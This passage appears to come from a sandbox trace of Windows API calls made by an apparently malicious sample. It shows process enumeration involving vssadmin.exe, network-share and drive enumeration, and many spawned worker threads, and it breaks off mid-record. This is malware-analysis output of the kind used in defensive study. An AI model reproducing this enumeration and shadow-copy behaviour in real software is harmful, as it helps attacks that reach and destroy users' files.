dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0058.085] lstrlenW (lpString="agent1c.exe") returned 11 [0058.085] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0058.086] lstrlenW (lpString="cmd.exe") returned 7 [0058.086] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0058.087] lstrlenW (lpString="conhost.exe") returned 11 [0058.087] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0058.087] lstrlenW (lpString="vssadmin.exe") returned 12 [0058.087] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0058.088] lstrlenW (lpString="VSSVC.exe") returned 9 [0058.088] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0058.089] lstrlenW (lpString="svchost.exe") returned 11 [0058.089] Process32NextW (in: hSnapshot=0x15c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0058.089] CloseHandle (hObject=0x15c) returned 1 [0058.089] Sleep (dwMilliseconds=0x1f4) Thread: id = 5 os_tid = 0xa90 [0031.773] WaitForSingleObject (hHandle=0x18fde4, dwMilliseconds=0xffffffff) returned 0xffffffff [0031.773] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x624a38 | out: hHeap=0x5f0000) returned 1 Thread: id = 6 os_tid = 0xa94 [0031.774] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a38 [0031.774] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a38, Size=0x20) returned 0x625c58 [0031.774] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625c58, Size=0x40) returned 0x626c38 [0031.774] GetLogicalDrives () returned 0x4 [0031.774] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x65e4a0 [0031.774] GetComputerNameW (in: lpBuffer=0x65e4a4, nSize=0x23dff6c | out: lpBuffer="XDUWTFONO", nSize=0x23dff6c) returned 1 [0031.775] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1000) returned 0x66e4a8 [0031.775] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x23dff3c | out: lphEnum=0x23dff3c*=0x6261e8) returned 0x0 [0031.776] WNetEnumResourceW (in: hEnum=0x6261e8, lpcCount=0x23dff38, lpBuffer=0x66e4a8, lpBufferSize=0x23dff40 | out: lpcCount=0x23dff38, lpBuffer=0x66e4a8, lpBufferSize=0x23dff40) returned 0x103 [0031.776] WNetCloseEnum (hEnum=0x6261e8) returned 0x0 [0031.776] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x23dff3c | out: lphEnum=0x23dff3c*=0x3ed1180) returned 0x0 [0036.429] WNetEnumResourceW (in: hEnum=0x3ed1180, lpcCount=0x23dff38, lpBuffer=0x66e4a8, lpBufferSize=0x23dff40 | out: lpcCount=0x23dff38, lpBuffer=0x66e4a8, lpBufferSize=0x23dff40) returned 0x0 [0036.429] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1000) returned 0x6e59c0 [0036.429] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x66e4a8, lphEnum=0x23dff10 | out: lphEnum=0x23dff10*=0x626368) returned 0x0 [0036.698] WNetEnumResourceW (in: hEnum=0x626368, lpcCount=0x23dff0c, lpBuffer=0x6e59c0, lpBufferSize=0x23dff14 | out: lpcCount=0x23dff0c, lpBuffer=0x6e59c0, lpBufferSize=0x23dff14) returned 0x103 [0036.698] WNetCloseEnum (hEnum=0x626368) returned 0x0 [0036.698] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1000) returned 0x3f220a8 [0036.698] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x66e4c8, lphEnum=0x23dff10 | out: lphEnum=0x23dff10*=0x0) returned 0x4b8 [0055.018] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1000) returned 0x3f280d8 [0055.018] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x66e4e8, lphEnum=0x23dff10 | out: lphEnum=0x23dff10*=0x0) returned 0x4c6 [0055.021] WNetEnumResourceW (in: hEnum=0x3ed1180, lpcCount=0x23dff38, lpBuffer=0x66e4a8, lpBufferSize=0x23dff40 | out: lpcCount=0x23dff38, lpBuffer=0x66e4a8, lpBufferSize=0x23dff40) returned 0x103 [0055.021] WNetCloseEnum (hEnum=0x3ed1180) returned 0x0 [0055.021] GetLogicalDrives () returned 0x4 [0055.021] Sleep (dwMilliseconds=0x64) [0055.273] GetLogicalDrives () returned 0x4 [0055.276] Sleep (dwMilliseconds=0x64) [0055.579] GetLogicalDrives () returned 0x4 [0055.579] Sleep (dwMilliseconds=0x64) [0056.429] GetLogicalDrives () returned 0x4 [0056.429] Sleep (dwMilliseconds=0x64) [0056.568] GetLogicalDrives () returned 0x4 [0056.568] Sleep (dwMilliseconds=0x64) [0057.077] GetLogicalDrives () returned 0x4 [0057.077] Sleep (dwMilliseconds=0x64) [0057.423] GetLogicalDrives () returned 0x4 [0057.423] Sleep (dwMilliseconds=0x64) [0057.601] GetLogicalDrives () returned 0x4 [0057.601] Sleep (dwMilliseconds=0x64) [0057.746] GetLogicalDrives () returned 0x4 [0057.746] Sleep (dwMilliseconds=0x64) [0057.943] GetLogicalDrives () returned 0x4 [0057.943] Sleep (dwMilliseconds=0x64) [0058.072] GetLogicalDrives () returned 0x4 [0058.072] Sleep (dwMilliseconds=0x64) [0058.175] GetLogicalDrives () returned 0x4 [0058.175] Sleep (dwMilliseconds=0x64) [0058.397] GetLogicalDrives () returned 0x4 [0058.397] Sleep (dwMilliseconds=0x64) Thread: id = 7 os_tid = 0xa98 [0031.777] GetTickCount () returned 0x18258 [0031.778] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x64b338 [0031.778] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x64b338, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x120 [0031.790] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x64b338, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11c [0031.793] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x64b338, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0031.794] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x64b338, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12c [0031.841] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6401d0 [0031.841] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6401d0, Size=0x20) returned 0x625c08 [0031.842] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x6401d0 [0031.842] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6401d0, Size=0x20) returned 0x625b90 [0031.842] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.539] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.539] Wow64DisableWow64FsRedirection (in: OldValue=0x24dff84 | out: OldValue=0x24dff84*=0x0) returned 1 [0032.539] lstrlenW (lpString="kernel32.dll") returned 12 [0032.540] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625c08 | out: hHeap=0x5f0000) returned 1 [0032.540] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.540] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625b90 | out: hHeap=0x5f0000) returned 1 [0032.540] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x62b430, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x130 [0032.541] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0032.736] GetTickCount () returned 0x1842c [0032.736] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0033.039] GetTickCount () returned 0x18507 [0033.039] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0033.820] GetTickCount () returned 0x1864e [0033.820] GetTickCount () returned 0x1864e [0033.820] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0034.152] GetTickCount () returned 0x18767 [0034.162] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0034.537] GetTickCount () returned 0x188ed [0034.537] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0034.942] GetTickCount () returned 0x18a83 [0034.942] GetTickCount () returned 0x18a83 [0034.942] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0035.390] GetTickCount () returned 0x18c18 [0035.390] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0035.786] GetTickCount () returned 0x18dae [0035.786] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0036.097] GetTickCount () returned 0x18ee6 [0036.097] GetTickCount () returned 0x18ee6 [0036.097] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0036.434] GetTickCount () returned 0x18fdf [0036.434] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0036.759] GetTickCount () returned 0x19127 [0036.759] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0037.178] GetTickCount () returned 0x1929d [0037.178] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0037.700] GetTickCount () returned 0x19481 [0037.700] GetTickCount () returned 0x19481 [0037.700] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0038.289] GetTickCount () returned 0x19684 [0038.289] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0038.750] GetTickCount () returned 0x19839 [0038.750] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0039.010] GetTickCount () returned 0x19932 [0039.010] GetTickCount () returned 0x19932 [0039.010] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0039.375] GetTickCount () returned 0x19a89 [0039.375] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0039.549] GetTickCount () returned 0x19b35 [0039.549] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0039.704] GetTickCount () returned 0x19bd1 [0039.704] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0039.951] GetTickCount () returned 0x19c9c [0039.951] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0040.410] GetTickCount () returned 0x19e41 [0040.410] GetTickCount () returned 0x19e41 [0040.410] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0040.917] GetTickCount () returned 0x19fe6 [0040.917] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0041.409] GetTickCount () returned 0x1a17c [0041.409] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0041.843] GetTickCount () returned 0x1a331 [0041.843] GetTickCount () returned 0x1a331 [0041.843] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0042.184] GetTickCount () returned 0x1a469 [0042.184] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0042.538] GetTickCount () returned 0x1a5c0 [0042.538] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0042.885] GetTickCount () returned 0x1a727 [0042.885] GetTickCount () returned 0x1a727 [0042.885] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0043.445] GetTickCount () returned 0x1a958 [0043.445] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0043.676] GetTickCount () returned 0x1aa33 [0043.676] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0043.849] GetTickCount () returned 0x1aaee [0043.851] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0044.047] GetTickCount () returned 0x1aba9 [0044.047] GetTickCount () returned 0x1aba9 [0044.047] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0044.334] GetTickCount () returned 0x1acd1 [0044.334] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0044.658] GetTickCount () returned 0x1ae09 [0044.658] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0044.880] GetTickCount () returned 0x1aef3 [0044.881] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0045.015] GetTickCount () returned 0x1af70 [0045.015] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0045.795] GetTickCount () returned 0x1b27c [0045.795] GetTickCount () returned 0x1b27c [0045.795] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0046.124] GetTickCount () returned 0x1b3c4 [0046.124] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0046.377] GetTickCount () returned 0x1b4cd [0046.378] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0047.215] GetTickCount () returned 0x1b808 [0047.216] GetTickCount () returned 0x1b808 [0047.217] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0047.379] GetTickCount () returned 0x1b8b3 [0047.379] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0047.642] GetTickCount () returned 0x1b9bd [0047.642] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0047.984] GetTickCount () returned 0x1bb14 [0047.985] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0048.533] GetTickCount () returned 0x1bd36 [0048.537] GetTickCount () returned 0x1bd36 [0048.541] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0048.823] GetTickCount () returned 0x1be5e [0048.828] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0049.748] GetTickCount () returned 0x1c1f7 [0049.748] GetTickCount () returned 0x1c1f7 [0049.748] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0050.066] GetTickCount () returned 0x1c32f [0050.066] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0050.350] GetTickCount () returned 0x1c447 [0050.350] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0050.599] GetTickCount () returned 0x1c541 [0050.599] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0051.502] GetTickCount () returned 0x1c8ca [0051.502] GetTickCount () returned 0x1c8ca [0051.502] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0051.866] GetTickCount () returned 0x1ca31 [0051.866] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0052.052] GetTickCount () returned 0x1caec [0052.052] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0052.378] GetTickCount () returned 0x1cc33 [0052.378] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0052.498] GetTickCount () returned 0x1ccb0 [0052.498] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0052.652] GetTickCount () returned 0x1cd4c [0052.652] GetTickCount () returned 0x1cd4c [0052.652] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0053.443] GetTickCount () returned 0x1d058 [0053.443] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0053.554] GetTickCount () returned 0x1d0d5 [0053.554] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0053.774] GetTickCount () returned 0x1d1af [0053.774] GetTickCount () returned 0x1d1af [0053.774] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0054.105] GetTickCount () returned 0x1d2f7 [0054.105] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0054.964] GetTickCount () returned 0x1d651 [0054.964] GetTickCount () returned 0x1d651 [0054.964] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0055.255] GetTickCount () returned 0x1d779 [0055.255] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0055.578] GetTickCount () returned 0x1d8b1 [0055.578] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0056.429] GetTickCount () returned 0x1dc0b [0056.429] GetTickCount () returned 0x1dc0b [0056.429] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0056.567] GetTickCount () returned 0x1dc98 [0056.567] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0057.024] GetTickCount () returned 0x1de1e [0057.025] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0057.378] GetTickCount () returned 0x1df85 [0057.378] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0057.534] GetTickCount () returned 0x1e021 [0057.535] GetTickCount () returned 0x1e021 [0057.537] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0057.719] GetTickCount () returned 0x1e0dc [0057.719] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0057.867] GetTickCount () returned 0x1e168 [0057.869] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0058.007] GetTickCount () returned 0x1e1f5 [0058.007] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0058.110] GetTickCount () returned 0x1e262 [0058.110] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) returned 0x102 [0058.397] GetTickCount () returned 0x1e37b [0058.397] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0x64) Thread: id = 8 os_tid = 0xa9c [0032.540] GetTickCount () returned 0x183af [0032.541] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x24) returned 0x66f830 [0032.541] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x66f830, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x118 [0032.543] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x66f830, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x138 [0032.545] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x66f830, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x13c [0032.547] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x66f830, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x140 [0032.550] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640338 [0032.550] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640338, Size=0x20) returned 0x625c08 [0032.550] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x640338 [0032.550] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x640338, Size=0x20) returned 0x625d70 [0032.550] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0032.551] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0032.551] Wow64DisableWow64FsRedirection (in: OldValue=0x25dff84 | out: OldValue=0x25dff84*=0x0) returned 1 [0032.551] lstrlenW (lpString="kernel32.dll") returned 12 [0032.551] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625c08 | out: hHeap=0x5f0000) returned 1 [0032.551] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0032.551] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625d70 | out: hHeap=0x5f0000) returned 1 [0032.551] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x64d440, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x144 [0032.554] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0032.737] GetTickCount () returned 0x1842c [0032.737] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0033.045] GetTickCount () returned 0x18507 [0033.045] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0033.858] GetTickCount () returned 0x1866d [0033.858] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0034.185] GetTickCount () returned 0x18786 [0034.185] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0034.537] GetTickCount () returned 0x188ed [0034.537] GetTickCount () returned 0x188ed [0034.537] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0034.943] GetTickCount () returned 0x18a83 [0034.943] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0035.390] GetTickCount () returned 0x18c18 [0035.390] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0035.786] GetTickCount () returned 0x18dae [0035.786] GetTickCount () returned 0x18dae [0035.786] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0036.097] GetTickCount () returned 0x18ee6 [0036.097] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0036.434] GetTickCount () returned 0x18fdf [0036.434] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0036.759] GetTickCount () returned 0x19127 [0036.759] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0037.177] GetTickCount () returned 0x1929d [0037.177] GetTickCount () returned 0x1929d [0037.177] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0037.700] GetTickCount () returned 0x19481 [0037.700] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0038.289] GetTickCount () returned 0x19684 [0038.289] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0038.750] GetTickCount () returned 0x19839 [0038.750] GetTickCount () returned 0x19839 [0038.750] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0039.010] GetTickCount () returned 0x19932 [0039.010] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0039.375] GetTickCount () returned 0x19a89 [0039.375] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0039.549] GetTickCount () returned 0x19b35 [0039.549] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0039.704] GetTickCount () returned 0x19bd1 [0039.704] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0039.951] GetTickCount () returned 0x19c9c [0039.951] GetTickCount () returned 0x19c9c [0039.951] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0040.410] GetTickCount () returned 0x19e41 [0040.410] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0040.918] GetTickCount () returned 0x19fe6 [0040.918] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0041.409] GetTickCount () returned 0x1a17c [0041.409] GetTickCount () returned 0x1a17c [0041.409] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0041.843] GetTickCount () returned 0x1a331 [0041.843] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0042.184] GetTickCount () returned 0x1a469 [0042.184] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0042.538] GetTickCount () returned 0x1a5c0 [0042.538] GetTickCount () returned 0x1a5c0 [0042.538] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0042.885] GetTickCount () returned 0x1a727 [0042.885] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0043.445] GetTickCount () returned 0x1a958 [0043.445] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0043.676] GetTickCount () returned 0x1aa33 [0043.676] GetTickCount () returned 0x1aa33 [0043.676] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0043.848] GetTickCount () returned 0x1aade [0043.849] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0044.047] GetTickCount () returned 0x1aba9 [0044.047] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0044.291] GetTickCount () returned 0x1aca3 [0044.291] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0044.615] GetTickCount () returned 0x1adea [0044.615] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0044.880] GetTickCount () returned 0x1aef3 [0044.880] GetTickCount () returned 0x1aef3 [0044.880] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0045.014] GetTickCount () returned 0x1af70 [0045.014] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0045.795] GetTickCount () returned 0x1b27c [0045.795] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0046.124] GetTickCount () returned 0x1b3c4 [0046.124] GetTickCount () returned 0x1b3c4 [0046.124] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0046.382] GetTickCount () returned 0x1b4cd [0046.382] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0047.217] GetTickCount () returned 0x1b808 [0047.217] GetTickCount () returned 0x1b808 [0047.217] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0047.379] GetTickCount () returned 0x1b8b3 [0047.379] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0047.642] GetTickCount () returned 0x1b9bd [0047.642] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0047.985] GetTickCount () returned 0x1bb14 [0047.985] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0048.571] GetTickCount () returned 0x1bd55 [0048.571] GetTickCount () returned 0x1bd55 [0048.571] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0048.829] GetTickCount () returned 0x1be5e [0048.831] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0049.748] GetTickCount () returned 0x1c1f7 [0049.748] GetTickCount () returned 0x1c1f7 [0049.749] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0050.066] GetTickCount () returned 0x1c32f [0050.066] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0x64) returned 0x102 [0050.350] 